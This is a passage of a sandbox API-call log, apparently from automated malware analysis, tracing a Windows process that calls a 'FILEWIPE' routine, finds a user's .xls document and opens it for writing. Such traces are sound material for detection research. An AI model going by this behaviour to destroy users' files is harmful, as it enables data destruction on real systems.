lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.553] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.553] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0176.553] FreeLibrary (hLibModule=0x74f20000) returned 1 [0176.553] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.553] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.553] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.553] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.554] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.555] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.555] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0176.555] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.572] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.573] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0e05420, ftCreationTime.dwHighDateTime=0x1d5da04, ftLastAccessTime.dwLowDateTime=0x508ab760, ftLastAccessTime.dwHighDateTime=0x1d5deb6, ftLastWriteTime.dwLowDateTime=0x508ab760, ftLastWriteTime.dwHighDateTime=0x1d5deb6, nFileSizeHigh=0x0, nFileSizeLow=0x14fb7, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Pwvig6N-.xls", cAlternateFileName="")) returned 0x90af58 [0176.573] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0176.573] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.573] CharLowerBuffW (in: lpsz="byte[85943]", cchLength=0xb | out: lpsz="byte[85943]") returned 0xb [0176.574] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.575] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0176.575] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.575] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0176.575] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0176.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0176.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0176.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0176.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c27c8 [0176.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c27c8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0176.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0176.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0176.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0176.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0176.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0176.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0176.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0176.576] FreeLibrary (hLibModule=0x75c90000) returned 1 [0176.576] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0176.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0176.576] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.576] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0176.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0176.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0176.576] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0176.576] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0176.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0176.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0176.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0176.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0176.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0176.576] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0176.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.577] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.577] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.577] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.577] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.577] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.577] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.578] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.578] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.578] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.578] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0176.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.578] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0176.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.578] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0176.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.578] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0176.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0176.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.578] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0176.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0176.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0176.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0176.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.579] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0176.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0176.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0176.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0176.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0176.579] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0176.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0176.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0176.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0176.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba408, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0176.580] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pwvig6n-.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0176.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0176.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0176.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0176.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0176.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0176.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0176.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0176.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0176.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0176.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0176.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0176.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0176.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0176.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0176.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0176.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbdefc8 | out: hHeap=0x8a0000) returned 1 [0176.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0176.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0176.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0176.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0176.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0176.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0176.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0176.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0176.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0176.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0176.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0176.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0176.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0176.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0176.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0176.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0176.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0176.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0176.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0176.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0176.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0176.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0176.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0176.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0176.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0176.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0176.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0176.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0176.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0176.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0176.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0176.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0176.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0176.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0176.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0176.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0176.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0176.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0176.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0176.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0176.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0176.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0176.582] FreeLibrary (hLibModule=0x75990000) returned 1 [0176.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0176.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0176.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0176.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0176.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) 